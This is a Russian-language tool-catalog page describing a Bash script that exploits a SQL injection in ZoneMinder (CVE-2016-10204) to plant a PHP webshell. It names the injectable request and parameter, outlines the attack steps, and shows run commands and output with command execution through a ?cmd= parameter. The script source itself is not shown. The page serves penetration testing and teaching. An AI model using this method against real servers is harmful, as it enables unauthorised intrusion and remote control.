Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2016-10204_Webshell — Bash-скрипт, демонстрирующий ручную эксплуатацию CVE-2016-10204 против целевой конечной точки, приводящую к загрузке php-веб-шелла. | Kitploit
Инструменты/GitHubGitHub/0xnullcomet/cve-2016-10204_webshell
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHub0xnullcomet/cve-2016-10204_webshell

CVE-2016-10204_Webshell

Bash-скрипт, демонстрирующий ручную эксплуатацию CVE-2016-10204 против целевой конечной точки, приводящую к загрузке php-веб-шелла.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
26 месяцев назадЕщё не проверено

CVE-2016-10204_Webshell

Bash-скрипт, демонстрирующий ручную эксплуатацию CVE-2016-10204 на целевой конечной точке, приводящую к загрузке php-веб-шелла.

В настоящее время переменная webshell настроена для полезной нагрузки MySQL. Её можно заменить на любую другую необходимую базу данных.

Дополнительную информацию об этой CVE можно найти в следующих источниках:

  • https://nvd.nist.gov/vuln/detail/CVE-2016-10204
  • https://www.exploit-db.com/exploits/41239
  • https://www.openwall.com/lists/oss-security/2017/02/05/1

Этот скрипт работает следующим образом:

  • Принимает целевой URL в формате регулярного выражения ^(http|https)://[^/]+/zm/index.php$
    • Например: http://192.168.10.100/zm/index.php
  • Проверяет, не присутствует ли уже веб-шелл по целевому URL и заданному суффиксу URL веб-шелла
    • Если присутствует, повторная эксплуатация не выполняется.
    • Если отсутствует, продолжает работу
  • Формирует вредоносный POST-запрос к конечной точке /zm/index.php?view=request&request=log&task=query&limit=100&minTime=1466674406.084434
    • Этот запрос содержит точку внедрения в параметре &limit=100, которую мы используем для следующих действий
    • Создаём новый файл веб-шелла внутри /var/www/html
    • SELECT строки "" INTO этот файл (мы передаём её в файл по мере его записи)
  • Проверяет, что загруженный веб-шелл был создан и доступен по сформированному URL
  • Предоставляет подтверждение этого, выполняя команду 'id' и выводя её результат.

Использование:

root@kitploit:~
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/chmod +x CVE-2016-10204_Webshell.sh

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh testme http://127.0.0.1/zm/index.php

Общее использование:
/bin/bash CVE-2016-10204_Webshell.sh <суффикс_URL_веб-шелла> <http://целевая_конечная_точка/zm/index.php>

Справка:


Пример:

root@kitploit:~

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Репозиторий автора: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]

[*]================================[*]
[*]Целевой хост: 192.168.177.52:3305          [*]
[*]Целевая конечная точка: http://192.168.177.52:3305/zm/index.php      [*]
[*]================================[*]


[*]================================[*]
[*]Попытка развёртывания веб-шелла. [*]
[*]================================[*]
Warning: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or
Warning: consider "--output <FILE>" to save to a file.
Exit Code for Timeout: 23

[*]================================[*]
[*]Развёртывание веб-шелла выполнено успешно. [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Выполнение доступно через параметр ?cmd= [*]
[*]================================[*]


Повторный запуск на уже эксплуатированной цели:

root@kitploit:~
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Репозиторий автора: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]

[*]================================[*]
[*]Целевой хост: 192.168.177.52:3305          [*]
[*]Целевая конечная точка: http://192.168.177.52:3305/zm/index.php      [*]
[*]================================[*]


[*]================================[*]
[*]Веб-шелл уже развёрнут.      [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Выполнение доступно через параметр ?cmd= [*]
[*]================================[*]


Встроенная справка:

root@kitploit:~
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh -h

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Репозиторий автора: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
CVE-2016-10204_Webshell
Bash-скрипт, демонстрирующий ручную эксплуатацию CVE-2016-10204 на целевой конечной точке,
приводящую к загрузке php-веб-шелла.

Дополнительная информация:
- https://nvd.nist.gov/vuln/detail/CVE-2016-10204
- https://www.exploit-db.com/exploits/41239
- https://www.openwall.com/lists/oss-security/2017/02/05/1

Использование:
  /bin/bash CVE-2016-10204_Webshell.sh <суффикс_URL_веб-шелла> <http://цель/zm/index.php>

Пример:
  /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

Примечания:
- Проверяет, существует ли уже веб-шелл, перед попыткой эксплуатации.
- Формирует вредоносную полезную нагрузку SQLi для записи PHP-веб-шелла в /var/www/html.
- Подтверждает развёртывание, выполняя 'id' через параметр ?cmd=.
- Пожалуйста, используйте ответственно только на устройствах, на которые у вас есть разрешение. Это предназначено только для образовательных целей.

Скачать инструмент